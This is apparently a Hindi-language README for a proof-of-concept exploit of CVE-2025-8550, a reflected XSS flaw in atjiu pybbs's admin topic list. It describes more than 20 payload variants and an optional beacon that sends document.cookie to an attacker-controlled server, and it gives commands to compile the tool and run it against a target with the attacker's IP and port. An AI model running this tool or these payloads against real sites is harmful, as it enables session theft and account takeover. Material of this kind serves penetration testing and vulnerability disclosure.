
CVE-2025-8550 के लिए स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, atjiu pybbs में एक प्रतिबिंबित XSS। 20+ पेलोड विविधताएं, कुकी बहिर्वेशन, मल्टीथ्रेडिंग, और पैठ परीक्षण के लिए अनुकूलन योग्य CLI शामिल हैं।
यह रिपॉजिटरी CVE-2025-8550 के लिए एक स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट होस्ट करती है, जो atjiu pybbs (≤ v6.0.0) में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह /admin/topic/list एंडपॉइंट के username पैरामीटर को लक्षित करता है, जिसमें उचित इनपुट सैनिटाइजेशन का अभाव है।
20+ पेलोड विविधताएँ: script, SVG, iframe, object, onerror हैंडलर और अधिक।
स्वचालित URL एन्कोडिंग: libcurl के curl_easy_escape के माध्यम से सुरक्षित इंजेक्शन सुनिश्चित करता है।
कुकी एक्सफिल्ट्रेशन (वैकल्पिक): document.cookie को हमलावर-नियंत्रित सर्वर पर भेजने के लिए बीकन इंजेक्शन।
मल्टीथ्रेडिंग: प्रयासों को समानांतर करने और परीक्षण को गति देने के लिए pthreads का उपयोग करता है।
अनुकूलन योग्य CLI: argparse द्वारा संचालित, निम्नलिखित को निर्दिष्ट करने का समर्थन करता है:
-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# एक्सप्लॉइट बाइनरी संकलित करें
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# लक्ष्य के विरुद्ध चलाएँ
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#कुकी भेजें :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> को atjiu pybbs के अपने इंस्टेंस से बदलें।-k का उपयोग करें (-i और -p की आवश्यकता है)।-c को छोड़ दें।MIT लाइसेंस